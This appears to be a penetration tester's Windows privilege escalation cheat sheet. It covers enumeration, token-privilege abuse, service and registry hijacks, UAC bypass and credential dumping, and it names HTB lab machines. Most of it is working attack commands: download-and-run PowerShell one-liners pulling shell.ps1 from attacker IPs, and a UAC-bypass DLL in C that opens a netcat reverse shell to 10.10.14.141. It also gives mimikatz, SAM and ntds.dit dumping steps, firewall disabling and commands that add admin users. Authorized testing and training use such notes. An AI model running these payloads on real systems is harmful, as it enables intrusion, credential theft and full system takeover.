Return to Main Page

Windows PrivEsc

Manual PrivEsc:

Use rlwrap on shell to enable arrow usage (up and down to navigate previous commands, left and right to navigate text)

Check user groups and privileges

whoami
whoami /all
whoami /priv
whoami /groups
net user <username>

Get info about a specific user

Kernel exploit

Google the last installed "hotfix + exploit"
Sherlock - predecessor to Watson
Watson
wes-ng

Check folders

Look for interesting files
C:\Users\*
C:\Program Files\
C:\Program Files (x86)\

Check for credentials

Autologin

get-item -path "HKLM:\software\microsoft\windows nt\currentversion\winlogon"
reg.exe query "HKLM\software\microsoft\windows nt\currentversion\winlogon"

Group Policy (GPP) passwords
C:\Windows\Panther\unattend.xml

Cached credentials

If credentials are cached then we can find the cleartext password using mimikatz

https://www.harmj0y.net/blog/redteaming/operational-guidance-for-offensive-user-dpapi-abuse/
HTB: Access

Check for cached credentials

cmdkey /list

Run command under context of a cached credential

runas /user:<user> /savecred "<command>"

Example

cmdkey /list

Currently stored credentials:
                        
Target: Domain:interactive=ACCESS\Administrator
Type: Domain Password
User: ACCESS\Administrator
                            
runas /user:ACCESS\Administrator /savecred "powershell iex(new-object net.webclient).downloadstring('http://10.10.14.77/shell.ps1')"

Check running processes, pay attention to admin

tasklist /V
Most application exploits are the same as other misconfigurations (weak folder configurations, unquoted service paths, etc)

Open ports

netstat -an

Ports listening on local host
Ones not listed during nmap scan/firewalled

Installed programs/applications

List applications that are installed by the Windows Installer

wmic product get name, version, vendor

Insecure Services

AllAccess, Start

Change binpath

Startup Apps/autorun

Important if we can reboot the box

Privilege Abuse

SeLoadDriverPrivilege
SeImpersonatePrivilege
SeImpersonatePrivilege
SeAssignPrimaryPrivilege
SeTcbPrivilege
SeBackupPrivilege

https://hackinparis.com/data/slides/2019/talks/HIP2019-Andrea_Pierini-Whoami_Priv_Show_Me_Your_Privileges_And_I_Will_Lead_You_To_System.pdf

SeRestorePrivilege
SeCreateTokenPrivilege
SeLoadDriverPrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege

Article on exploiting privileges: https://foxglovesecurity.com/2017/08/25/abusing-token-privileges-for-windows-local-privilege-escalation/

Always Install Elevated

HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer

reg query HKLM\software\policies\microsoft\windows\installer /v alwaysinstallelevated

Create msi reverse shell and execute it

msiexec /qn /i shell.msi

Abuse GUI Program running as admin

Inside application open file: file://c:/windows/system32/cmd.exe

Might get admin command prompt

Look for exploits for 3rd party drivers

Enumerate drivers

driverquery /v
Powershell - driverquery.exe /v /fo csv | ConvertFrom-CSV | Select-Object‘DisplayName’, ‘Start Mode’, Path

Enumerate Driver Versions

Powershell - Get-WmiObject Win32_PnPSignedDriver | Select-Object DeviceName,DriverVersion, Manufacturer | Where-Object {$_.DeviceName -like "*VMware*"}

Search the registry for keys and values that contain "password":

reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
reg query "HKLM\software\microsoft\windows nt\currentversion\winlogon"
reg query "HKCU\software\simontatham\putty\sessions" /s
reg query HKLM\System\ControlSet001\Control\CurrentPass
reg query HKLM\System\ControlSet002\Control\CurrentPass
HKLM\System\CurrentControlSet\Control\CurrentPass

Scheduled Tasks

schtasks /query /fo LIST /v

mysql

run commands as mysql user

raptor_winudf

Search for creds

Powershell
psexec
winrm
wmiexec
pth-winexe

Active Directory attacks

ASREPRoast

If there are users without kerberos pre-auth required.

Kerberoast

If able to authenticate as a user.

PrivEsc Tools

Powerup.ps1

IEX(New-Object Net.WebClient).downloadString('http://<ip address>/PowerUp.ps1')
Invoke-AllChecks

Winpeas

Seatbelt

Windows-Privesc-Checker

Windows Exploit Suggester - Next Generation

wesng.py /systeminfo.txt -i 'Elevation of Privilege' --exploits-only

Metasploit

Bloodhound

Use against DC
Clone repo for most up-to-date version
Usage instructions:

Start neo4j on Kali

run: neo4j console

Default credentials - neo4j:neo4j

Run collector/ingestor on victim AD DC machine

Locally with .\Sharphound.exe -c all
Remotely using python: sudo python3 bloodhound.py -c all -u <user> -p '<password>' -ns <ip> -d <domain name> --zip

Start bloodhound on Kali

sudo ./Bloodhound --no-sandbox

Drag and drop file generated by sharphound into Bloodhound window
On top left where it says "Search for a node" enter the username that is being used on the victim machine
right click icon in center with pwned victim machine user and "Mark User as Owned"
Things to check under Queries/Analysis tab

Shortest Paths from Kerberoastable Users
Shortest path from Owned principles
Shortest path to High Value Targets

Can right click on account associations and select "Help" and it will give info how an AD association can be abused

SharpCollection

Common C# offensive tools that are checked for updates daily, and then compiled

cmd Commands

Location: C:\Windows\System32\cmd.exe

Miscellaneous

Base64 encode file	certutil encode <file> <output name>
grep string from output	<command> \| findstr

System Information & Control

show hostname	hostname
Restart	shutdown -r -t 10 && exit && exit because an error message can pop up when initiating a restart with a shell still active.
List system-wide updates	wmic qfe get Caption, Description, HotFixID, InstalledOn
List version and architecture	systeminfo \| findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
List version and architecture	systeminfo \| findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
Enumerate drivers installed	driverquery /v
View statistics	net statistics

Applications & Services

List running services	tasklist
Running Processes & Services	tasklist /SVC

User & Group Permissions

view current user	whoami echo %username%
See all user accounts	net user
More details about specific account	net user <username>
View domain users	net user /domain
View local administrators group	net localgroup Administrators
View groups	net group
Shows all groups on the domain	net group /domain
net accounts	Check accounts info (password lockout, etc)
Add user	net user <username> <password> /add
Add user to domain	net user <username> <password> /add /domain
Change password	net user <username> <password>
View users in a group	net group "<Group Name>"
Add user to a group	net group <Group Name> <user> /add net group <Group Name> <user> /add /domain
Make user a local admin	net localgroup administrators <username> /add
Give full control of file to user	cacls <file> /t /e /p <user>:F - F = Full Control
Remove access to file from user	cacls <file> /r /e <user>

File System

Edit text document

Copy con C:\file.txt

Search for files

dir <file name>

/s	List all occurrences of the file in the specified directory and subdirectories
/r	Display alternate data streams of the file (files that are acting like folders and contain files inside of them) If data stream files are found, display content with Powershell: (Get-Content <main file> -Stream <File inside the file>

Find file

where <file name>
where /r C:\ <file name>
where /R C:\ <file name>

Mount smb share

net use <drive letter>: \\<SMB Server ip>\<smb share to mount>

List all drives that are currently mounted as well as unmounted but connected

mountvol

Analyze encrypted files

cipher /c <file>

Check file permissions

cacls <file>

Networking

Disable firewall - New way	netsh advfirewall set allprofiles state off
Disable Firewall - Old way	netsh firewall set opmode disable
Disable firewall service (can only run as SYSTEM?)	net stop mpssvc
Current firewall profile	netsh advfirewall show currentprofile
Firewall rules	netsh advfirewall firewall show rule name=all
Show open ports	netstat -ano
Network Information	ipconfig /all

Powershell Commands

System Information & Control

Enumerate drivers	Powershell - driverquery.exe /v /fo csv \| ConvertFrom-CSV \| Select-Object‘DisplayName’, ‘Start Mode’, Path
Enumerate driver versions	Powershell - Get-WmiObject Win32_PnPSignedDriver \| Select-Object DeviceName,DriverVersion, Manufacturer \| Where-Object {$_.DeviceName -like "VMware"}
Check operating system architecture	[environment]::Is64BitOperatingSystem
Check powershell session architecture	[environment]::Is64BitProcess 64-bit powershell C:\Windows\SysNative\WindowsPowerShell\v1.0\powershell.exe
Check language mode (such as constrained, if being restricted by UAC)	$ExecutionContext.SessionState.LanguageMode
Environment variabels	dir env:
Get time & date	Get-Date
Powershell history	C:\Users\<user>\appdata\roaming\microsoft\windows\powershell\psreadline\ConsoleHost_history.txt
Powershell location	echo $PSHOME
See available powershell commands	Get-Command

User & Group Permissions

Create Credential Variable	$pass = ConvertTo-SecureString '<password>' -AsPlainText -Force $cred = New-Object System.Management.Automation.PSCredential('<Username>', $pass)
Decrypt SecureString password to plaintext from CLI XML file.	(Import-CliXml -Path user.txt).GetNetworkCredential().Password
Query user information	Get-ADUser <user> [-properties *]
View service permissions	$acl = get-acl HKLM:\System\CurrentControlSet\Services ConvertFrom-SddlString -Sddl $acl.Sddl -type RegistryRights \| ForEach-Object {$_.DiscretionaryAcl}

File System

Read file content	Get-Content <file name> gc <file name>
Sort files by last write time	dir \| sort LastWriteTime
Read new lines written to file	Get-Content <file> -wait -tail <#> Get-Content <file> -wait -tail <#> \| Select-String -Pattern "<pattern>"
Check file/folder permissions	Get-ACL <file/folder> \| Fl *
View file contents	(Get-Content <file>).substring(0,16)
Search for file	Get-ChildItem -Path V:\Myfolder -Filter CopyForbuild.bat -Recurse -ErrorAction SilentlyContinue -Force
Recursively show file names	gci -recurse \| select FullName
Show only files	gci -File
Ignore errors	-ErrorAction SilentlyContinue ErrorAction ignore
Parse .lnk files	$WScript = New-Object -ComObject WScript.Shell $SC = Get-ChildItem *.lnk $WScript.CreateShortcut($sc)

Network

View open TCP ports and running processes

Get-NetTCPConnection -State Listen | Select-Object -Property *,@{'Name' = 'ProcessName';'Expression'={(Get-Process -Id $_.OwningProcess).Name}} | FT ProcessName, LocalAddress, LocalPort -autosize

Miscellaneous

Secretly run scripts

powershell.exe -ExecutionPolicy Bypass –NoLogo –NonInteractive –NoProfile –File <file.ps1>

enable colors

reg add HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1

dot-source / load all variables & functions from powershell script

.\<script>.ps1

iex (New-Object System.Net.Webclient).DownloadString('https://website.com/url/to/file.ps1')

Enable RDP

Enable RDP service	Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -name "fDenyTSConnections" -value 0
Set firewall rules	Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
Enable restricted admin RDP login	New-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Lsa' -Name 'DisableRestrictedAdmin' -Value 0 -PropertyType DWORD

Convert SecureString to PlainText

[System.Net.NetworkCredential]::new("", $SecurePassword).Password

File Transfers

Download to Windows

Base64 Decoding

powershell -e <base 64>

Download file

invoke-webrequest -Uri http://<ip address>/shell.exe [-OutFile <file>]

IWR -Uri <url> [-OutFile <file>]

Download file with Powershell

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://<ip address>/wget.exe','C:\<output directory and file name>')

powershell "(new-object System.Net.WebClient).DownloadFile('http://<ip address>/wget.exe','C:\<output directory and file name>')"

(new-object System.Net.WebClient).DownloadFile('http://<ip address>/shell.ps1',<output directory and file name>')

wget <url> -outfile <file name>

Download file with cmd

certutil -urlcache -split -f http://<ip address>/<file name> C:\\<output directory and file name>

Download and run powershell script

powershell -c "IEX(New-Object Net.WebClient).downloadString('http://<ip address>/shell.ps1')"

powershell "IEX(New-Object Net.WebClient).downloadString('http://<ip address>/shell.ps1')"

IEX(IWR http://<ip address>/shell.ps1 -UseBasicParsing)

IEX(IWR(<url>))

SMB

Mount SMB share using powershell to new drive and using powershell credential object

Start SMB share on Kali	impacket-smbserver <Share Name> <Directory of Share> -smb2support -user <Username to connect to share> -password <Password to connect to share> Some machines do not work with smb2support. Other machines require it. Credentials optional. Can skip next step if not used.
Create SMB Share Credential Variable	$pass = ConvertTo-SecureString '<password>' -AsPlainText -Force $cred = New-Object System.Management.Automation.PSCredential('<Username>', $pass) If it is a domain account then: $cred = New-Object System.Management.Automation.PSCredential('<Domain>\<Username>', $pass) Verify $cred creation by echoing it
Connect to SMB Share From Windows	New-PSDrive -Name <Drive Name for SMB Share> -PSProvider FileSystem -Credential $cred -Root \\<ip of attacker>\<Share Name> If accessing the same share from multiple shells on the same windows machine it works best to give them each different drive names (-Name <Name>)
Open SMB Share on Windows	<Drive Name Assigned to SMB Share>:

Mount SMB share using cmd and simple credentials

Create SMB Share	sudo impacket-smbserver <Share Name> <Share Directory> -smb2support -user <username> -password <password>
Connect to share	net use \\<ip address>\<share name> /u:<username> <password> net use x: \\<ip>\<share name> /u:<user> <password>
Open share	cd \\<ip address>\<share name>\

Create SMB share using Linux's built-in SMB server

Create SMB Share (optional and self-explanatory parameters included)	sudo vi /etc/samba/smb.conf [share] comment = My Share browseable = yes path = /srv/SMB read only = no guest ok = yes writable = yes create mask = 0777
Might need to give SMB permissions to share directory	chmod 777 <smb share directory> chmod 755 <smb share directory>
Start Share	service smbd restart

Troubleshoot by using smbclient and access the SMB directory on our machine and attempt to retrieve or upload files.

Upload to windows

Upload with Powershell to Web Server

Invoke-RestMethod -Method PUT -Uri "http://<ip address>:<port>/<file name>" -Body $variable

powershell (New-Object System.Net.WebClient).UploadFile('http://<ip address>/<file name>', '<file name>')

Upload to tftp

tftp is only on Windows until XP & 2003

Setup TFTP on Kali	sudo apt install atftp
Create tftp Directory	sudo mkdir /tftp
Set owner "nobody" on tftp Directory	sudo chown nobody: /tftp
Activate tftp server on port 69	sudo atftpd --daemon --port 69 /tftp
Upload file from Windows to Linux	tftp -i <ip address> put file.txt

Base64 Encoding

base64 w/ powershell	$fc = Get-Content <file> $fe = [System.Text.Encoding]::UTF8.GetBytes($fc) [System.Convert]::ToBase64String($fe)
Read file with Kali	echo -n <base64 text> \| base64 -d

Upload with powercat

Set listener on receiving machine	nc -lvnp <port #> > receiving_file.ps1
Send file with PowerCat	powercat -c <ip address> -p <port #> -i C:\<Directory and file name>

Upload from Windows

Upload to Linux web server

Upload server creation

Create upload.php in /var/www/html	<?php $uploaddir = '/var/www/uploads/'; $uploadfile = $uploaddir . $_FILES['file']['name']; move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile) ?>
Create directory to upload to	mkdir /var/www/uploads sudo chown www-data: /var/www/uploads
Start web server	sudo systemctl start apache2

Upload file

powershell (New-Object System.Net.WebClient).UploadFile('http://<ip address>/upload.php', '<file>')

Startup Apps

Program for startup apps that should start for all users (including admin):

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

Directory
if we have access, we can add a reverseShell.exe, and when admin logs in we will get a admin priv reverse shell.

Check access to directory with accesschk.exe:

accesschk.exe /accepteula -d "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"

files in StartUp directory must be shortcuts (.lnk)

VBScript to create a shortcut file:


Set oWS = WScript.CreateObject("WScript.Shell")
sLinkFile = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\reverse.lnk"
Set oLink = oWS.CreateShortcut(sLinkFile)
oLink.TargetPath = "C:\PrivEsc\reverse.exe"
oLink.Save

cmd "cscript CreateShortCut.vbs"

Prilivege Abuse

SeImpersonatePrivilege

Rotten Potato

Works up until sometime in 2019.
Patched on latest Windows 10.

Juicy Potato

JuicyPotato.exe -l 1337 -p <program> -t * -c <{CLSID}>

Rogue Potato

More advanced and complicated than previous potato exploits.
Instructions

Listener on Kali: sudo socat tcp-listen:135,reuseaddr,fork tcp:<Victim ip address>:9999
On victim Windows machine: RoguePotato.exe -r 10.0.0.5 -l 9999 -e "C:\windows\system32\cmd.exe"

PrintSpoofer

Targets print spooler service
Does not require any port forwarding like potato exploits.
The entire exploit runs on the target machine.
Requires C++ redistributable is installed.
PrintSpoofer.exe -i -c "C:\reverse\shell.exe"

SeAssignPrimaryTokenPrivilege

Potato Exploits (SeImpersonatePrivilege)

SeLoadDriverPrivilege

Download these files:

Capcom.sys from fuzzysecurity
https://github.com/TarlogicSecurity/EoPLoadDriver/

eoploaddriver.cpp

Exploitcapcom from github

Compile EoPLoadDriver in visual studio

Create a new project

Console app
Name it LoadDriver

Open LoadDriver.cpp

Replace all contents with contents from eoploaddriver.cpp

Select "Release" and "x64"
Build --> Rebuild Solution. LoadDriver.exe should be created.

Compile ExploitCapCom

File --> Open -- Project/Solution

Select Exploit Capcom
Set "Release" and "x64"
Rebuild solution
ExploitCapCom.exe should be created

Transfer ExploitCapCom.exe, LoadDriver.exe, and capcom.sys to victim machine

LoadDriver.exe System\CurrentControlSet\MyService C:\<path to capcom.sys>
.\ExploitCapCom.exe
Should have system shell.

SeBackupPrivilege

Grants read access to all objects on the system regardless of ACL

Read sensitive files
Extract hashes

Pass-the-hash
Crack them

Backup ntds file to SMB server

Create NTFS share on attacker

Create 2gb NTFS folder called ntfs.disk	dd if=/dev/zero of=ntfs.disk bs=1024M count=2
Create loopback setup	sudo losetup -fP ntfs.disk
Check losetup	losetup -a
Create NTFS disk	sudo mkfs.ntfs /dev/loop0
Mount NTFS disk to a folder	sudo mount /dev/loop0 ./smb
Edit SMB to setup SMB share	sudo vi /etc/samba/smb.conf [shared] comment = <anything> browseable = yes path = <local path to SMB share> read only = no guest = yes
Start smb share	sudo systemctl restart smbd

Backup ntds file from victim

echo y | wbadmin start backup -backuptarget:\\<ip address>\share -include:C:\windows\ntds\

extract contents of .vhdx on victim (using attacker SMB share)

echo y | wbadmin start recovery -version:<version> -itemtype:file -items:C:\windows\ntds\ntds.dit -recoverytarget:C:\ -notrestoreacl

Get version

victim: "wbadmin get versions"

Version identified:<version>

ntds.dit should be in C:\

SeRestorePrivilege

Grants write access to all objects on the system regardless of ACL
Modify service binaries
Overwrite DLLs used by SYSTEM processes
Modify registry settings

SeTakeOwnershipPrivilege

Lets the owner take ownership over an object
Same as SeRestorePrivilege after taking ownership of files

More reading on token abuse: https://github.com/hatRiot/token-priv/blob/master/abusing_token_eop_1.0.txt

Always Install Elevated

Check if enabled

HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer

reg query HKLM\software\policies\microsoft\windows\installer /v alwaysinstallelevated

Create msi reverse shell and execute it

msiexec /qn /i shell.msi

Autorun Applications

Enumerate Auto Run Programs

reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
check for write to file permissions

accesschk.exe /accepteula -quvw <user> <service>

Insecure File Permissions

Look for files of any type that can help break into the system. Scripts with hardcoded credentials, other sensitive files, etc.

Search for world writable files:

Accesschk.exe -uws "Everyone" "C:\Program Files"
Powershell.exe "Get-ChildItem "C:\Program Files" -Recurse | Get-ACL | ?{$_.AccessToString -match "Everyone\sAllow\s\sModify"}"

Configuration Files

Look for files like Unattend.xml which might contain credentials
Search for files with pass in the name or ending in .config

dir /s *pass* == *.config

Recursively search for files in the current directory that contain the word “password” and also end in either .xml, .ini, or .txt:

findstr /si password *.xml *.ini *.txt

Insecure Services

Manually enumerate insecure services

View user service permissions

$acl = get-acl HKLM:\System\CurrentControlSet\Services

ConvertFrom-SddlString -Sddl $acl.Sddl -type RegistryRights | ForEach-Object {$_.DiscretionaryAcl}

List services

gci HKLM:\SYSTEM\CurrentControlSet\Services

List started services

cmd.exe /c wmic service where started=true get name, startname

List services:

Running as: SYSTEM
Start/stop type: manual

Create list of all services	$services = Get-ItemProperty -Path HKLM:\System\CurrentControlSet\Services\*
Show all services owened by SYSTEM and start type is manual	$services \| where { ($_.ObjectName -match 'LocalSystem') -and ($_.Start -match '3') }
Get list of services with only name, no details	$names = $services.pschildname
List all services owened by SYSTEM, start type manual, and we have permission to start	$canStart = Foreach ($service in $names) { $sddl = (cmd /c sc sdshow $service); if ($sddl -match "RP[A-Z]*?;;;AU") { $service }}

List permissions for a service

sc.exe sdshow <service>

ConvertFrom-SDDLString -Sddl "<output from sc.exe sdshow <service>>" | ForEach-Object {$_.DiscretionaryAcl}

How to read the permissions: https://dimitri.janczak.net/2018/06/01/start-stop-service-rights-to-non-administrators/

Tools

winPEAS

Check for service vulnerabilities

winPEASany.exe quiet servicesinfo

sc.exe

Start/Stop a service	sc.exe start/stop <service name>
Query the configuration of a service	sc.exe qc <name>
Query the current status of a service	sc.exe query <name>
Modify a configuration option of a service	sc.exe config <name> <option>= <value>
Change service start type	sc config <Service Name> start= auto
Change binary path	sc config <name> binpath= "\"C:\path\to\reverse_shell\""

accesschk.exe

Check for services we have rights/privileges to	accesschk.exe /accepteula -uwcqv "Authenticated Users" *
More details on user groups rights/privileges to a service	accesschk.exe /accepteula -ucqv <Service Name>
verify user permissions to a service	accesschk.exe /accepteula -ucqv <username> <service>
Check for permissions to write in a directory	accesschk.exe /accepteula -uwdq C:\directory
Check for access to insecure executables	accesschk.exe /accepteula -quvw <Executable>

Start/Stop a service

net start/stop <name>

wmic

Check service start options	wmic service where caption="<ServiceName>" get name, caption, state, startmode
Check running services	wmic service get name,displayname,pathname,startmode
Get running services that are auto and not standard windows	wmic service get name,displayname,pathname,startmode \|findstr /i "auto"\|findstr /i /v "c:\windows"

powershell

List running services	Get-WmiObject win32_service \| Select-Object Name, State, PathName \| Where-Object {$_.State -like 'Running'}
Start service	Start-Service <service>

List running services

tasklist

icacls

Check directory permissions	icacls "C:\<Directory>"
Check for access to insecure executable	Icacls "<Executable>"

Insecure Service Properties

Change binary path

sc config <name> binpath= "\"C:\reverse_shell.exe""
sc.exe config usosvc binpath="cmd.exe /c powershell.exe -EncodedCommand <base64>

Unquoted Service Path

Try to raplce a path location to a reverse shell executable

Example

C:\Program Files\Unquoted Path Service\Common Files\originalservice.exe

windows would try to execute "Program" first, then "Unquoted", then "Common", and finally "originalservice.exe"

If we can create a reverse shell named "Program.exe", "Unquoted.exe", etc, we can get reverse shell

Weak Registry Permissions

INTERACTIVE group includes all users that can login locally

Check registry permissions using PowerShell

Get-Acl HKLM:\registry\directory | format-list

Check permissions using accesschk.exe

accesschk.exe /accepteula -uvwqk HKLM\registry\directory

Check current values in registry entry

Method 1	reg query HKLM\System\CurrentControlSet\services\<service>
Method 2	Get-Item HKLM:\System\CurrentControlSet\Services\<service>

Change registry value

Method 1	reg add HKLM\service\path /v ImagePath /t REG_EXPAND_SZ /d D:\PrivEsc\shell4444.exe /f
Method 2	Set-ItemProperty -path HKLM:\System\CurrentControlSet\Services\<service> -Name ImagePath -Value "<executable>"

Insecure Service Executables

If able, replace original service executable with our own.

Check for access with accesschk.exe	accesschk.exe /accepteula -quvw "C:\<executable>"
Check access with icacls	Icacls "C:\<executable>"

DLL Hijacking

Enumerate non-windows services to see which one we are able to start/stop
Analyze the service executable using procmon and implement a malicious .dll file:

Download executable
Open procmon
Stop and clear capture
Push ctrl + L - drop down menu for "Process Name" - enter process name - push add & OK
Deselect "show registry activity" & "show network activity"
Start capture
Look for dll's that are attempted to be executed but do not exist. Put a reverse shell .dll in that directory

Start the vulnerable service

Scheduled Tasks

Tasks run at time intervals or by events (log-on, etc)

Tasks run with privileges of user who created them.

Administrator can set tasks to run as other users.

List all scheduled tasks your user can see:

Schtasks /query /fo LIST /v
Get-ScheduledTask| where {$_.TaskPath-notlike"\Microsoft*"} | ft TaskName,TaskPath,State

Usually need to look for tasks based on other clues like finding a script or log file that shows a scheduled task is being run.

look for a script running on a schedule and modify it with some malicious action. Look into interesting directories.

Bypass UAC

UAC Bypass requires administrator account

UAC bypass required if shell is giving adiministrator access denied

Requires an interactive shell

ncat does not work.
Use a metasploit shell and attach to explorer or another process with a 1 (for interactive) in the 'ps' list (seen after getting a metasploit shell).

Typically required for applications to launch a gui

UAC bypasses

https://github.com/hfiref0x/UACME
net use x: \\127.0.0.1\c$

Helpful post on understanding UAC settings

https://devblogs.microsoft.com/oldnewthing/20160816-00/?p=94105

UAC Bypass dll

#include <windows.h>

BOOL WINAPI DllMain(HINSTANCE hinstDll, DWORD dwReason, LPVOID lpReserved)
{
        switch(dwReason)
        {
                case DLL_PROCESS_ATTACH:
                        WinExec("C:\\Users\\batman\\nc.exe 10.10.14.141 7777 -e powershell", 0);
                        break;
                case DLL_PROCESS_DETACH:
                        break;
                case DLL_THREAD_ATTACH:
                        break;
                case DLL_THREAD_DETACH:
                        break;
        }

        return 0;
}

/* i686-w64-mingw32-g++ main.c -lws2_32 -o srrstr.dll -shared */

Check if UAC is on

reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System

EnableLUA

0 = UAC enabled, no bypass needed, can PsExec to SYSTEM
1 = UAC disabled, need to check the other 2 keys

ConsentPromptBehaviorAdmin

Can take on 6 different values

PromptOnSecureDesktop

Either 1 or 0

If ConsentPromptBehaviorAdmin=2 & PromptOnSecureDesktop=1 then UAC bypass will not work
If ConsentPromptBehaviorAdmin=5 & PromptOnSecureDesktop=1 then UAC bypass will work

ConsentPromptBehaviorAdmin Values:

Value	Meaning
0x00000000	This option allows the Consent Admin to perform an operation that requires elevation without consent or credentials.
0x00000001	This option prompts the Consent Admin to enter his or her user name and password (or another valid admin) when an operation requires elevation of privilege. This operation occurs on the secure desktop.
0x00000002	This option prompts the administrator in Admin Approval Mode to select either "Permit" or "Deny" an operation that requires elevation of privilege. If the Consent Admin selects Permit, the operation will continue with the highest available privilege. "Prompt for consent" removes the inconvenience of requiring that users enter their name and password to perform a privileged task. This operation occurs on the secure desktop.
0x00000003	This option prompts the Consent Admin to enter his or her user name and password (or that of another valid admin) when an operation requires elevation of privilege.
0x00000004	This prompts the administrator in Admin Approval Mode to select either "Permit" or "Deny" an operation that requires elevation of privilege. If the Consent Admin selects Permit, the operation will continue with the highest available privilege. "Prompt for consent" removes the inconvenience of requiring that users enter their name and password to perform a privileged task.
0x00000005	This option is the default. It is used to prompt the administrator in Admin Approval Mode to select either "Permit" or "Deny" for an operation that requires elevation of privilege for any non-Windows binaries. If the Consent Admin selects Permit, the operation will continue with the highest available privilege. This operation will happen on the secure desktop.

Eventvwr.exe UAC bypass:

Works on Windows 7, 8, and 10. Does not work on Vista
Guide: https://ivanitlearning.wordpress.com/2019/07/07/bypassing-default-uac-settings-manually/
Exploit in C (requires minimal editing) - https://github.com/turbo/zero2hero

Pre-made UAC bypass executables on Kali

bypassuac-x86.exe & bypassuac-x64.exe
Same limitations as eventvwr.exe UAC bypass
bypassuac-x**.exe /c C:\directory\to\shell4444.exe

Finding Logged in Users

Enumerate Logged on Users

Individual Workstation

NetWkstaUserEnum

Requires admin privileges

Powerview.ps1

Get-NetLoggedon –ComputerName <workstation name>

Domain Enumeration

NetSessionEnum

Enumerate active sessions on domain joined machines
Does not require admin privileges
Use against file servers and domain controllers
Powerview.ps1

Get-NetSession

Get-NetSession –ComputerName <domain controller or server – ex. dc01>

Cached Credentials

Check for cached credentials

cmdkey /list

Run command under context of a cached credential

runas /user:<user> /savecred "<command>"

Example

cmdkey /list

Currently stored credentials:
                        
Target: Domain:interactive=ACCESS\Administrator
Type: Domain Password
User: ACCESS\Administrator
                            
runas /user:ACCESS\Administrator /savecred "powershell iex(new-object net.webclient).downloadstring('http://10.10.14.77/shell.ps1')"

If credentials are cached then we can find the cleartext password using mimikatz

Master key

Location - C:\Users\<USER>\AppData\Roaming\Microsoft\Protect\<SID>\<GUID>

<SID> - Users security identifier
<GUID> - Name of master key

A user can have multiple master keys

Master key can be decrypted using user's password or domain backup key

A decrypted master key can be used to decrypt any DPAPI data blobs

Decrpyt using mimikatz

dpapi::masterkey /in:<master key file> /sid:<SID> /password:<password>

Encrypted Credential Manager Credentials

User credential Locations

C:\Users\<USER>\AppData\Local\Microsoft\Credentials\

System credential location - %systemroot%\System32\config\systemprofile\AppData\Local\Microsoft\Credentials\

mimikatz decrypt file using master key

# dpapi::cred /in:<credential file>

If ran after decrypting a master key the mimikatz will automatically apply it

Resources:

https://www.harmj0y.net/blog/redteaming/operational-guidance-for-offensive-user-dpapi-abuse/
HTB: Access

Security Identifier (SID)

Every account has one.

There is a separate one for each account that is used for elevated privileges (UAC)

Windows refers to accounts by SIDs, people refer to accounts by account names

All SIDs start with S-1-5-21

Admin always ends in 500
Guest always ends in 501
S-1-5-19 is the LocalSystem account

Example SID: S-1-5-21-1180699209-877415012-3182924384-1004

S	1	5	21-1180699209-877415012-3182924384	1004
Indicates this is a SID	SID specification version number	Identifier authority	Domain or local computer identifier	Relative ID

Dump Proccess

.\procdump64.exe -ma <PID> -accepteula

Mimikittenz

Check memory of user processes for passwords. By defalt checks IE, Chrome, and Firefox for POST requests to well known websites.

https://live.sysinternals.com/

Dump Hashes

Dumped hash format

Username:#:LM HASH:NTLM HASH:::

SAM, SYSTEM, and SECURITY Location

C:\Windows\System32\config\
Backup Locations

C:\Windows\System32\config\RegBack
C:\Windows\Repair

reg save HKLM\<file> <Out file>

reg save HKLM\SAM C:\SAM
reg save HKLM\SECURITY C:\SECURITY
reg save HKLM\SYSTEM C:\SYSTEM

vssadmin

Dump ntds.dit

vssadmin create shadow /for=C:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\ShadowCopy
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\ShadowCopy

mimikatz

Extracts hashes from the Local Security Authority Subsystem (LSASS)
Dump creds/hashes

Summary

privilege::debug
token::elevate
lsadump::sam
sekurlsa::logonpasswords

Explained/Detailed

Mimikatz must be launched from an administrative command prompts

Must first execute two commands:

privilege::debug – enables SeDebugPrivilege

If fails, mimikatz was most likely not executed with admin privileges

token::elevate

Elevates mimikatz security token from administrator to SYSTEM
If mimikatz is launched from a SYSTEM shell, this step can be skipped

Dump SAM contents (Security Account Manager)

lsadump::sam

Dump NTLM hash

sekurlsa::logonpasswords

This will dump the credentials of all users currently logged into the workstation or server.

Includes remote logins like RDP sessions

If WDigest is enabled Mimikatz will reveal cleartext passwords alongside hashes (Windows 7)

ERROR kuhl_m_sekurlsa_acquireLSA; Key import

Newer Windows update makes it so mimikatz versions 2.2.0 and newer do not work. Must use an older version of mimikatz.

https://gitlab.com/kalilinux/packages/mimikatz/-/tree/d72fc2cca1df23f60f81bc141095f65a131fd099/

Other tools such as samdump2, pwdump, fgdump, and Windows Credential Editor (wce) work well against older Windows OS's such as XP or Server 2003

impacket-secretsdump

Dump hashes locally

impacket-secretsdump -sam <SAM file> -security <SECURITY file> [-system <SYSTEM file>] LOCAL

Active Directory

Authentication

NTLM

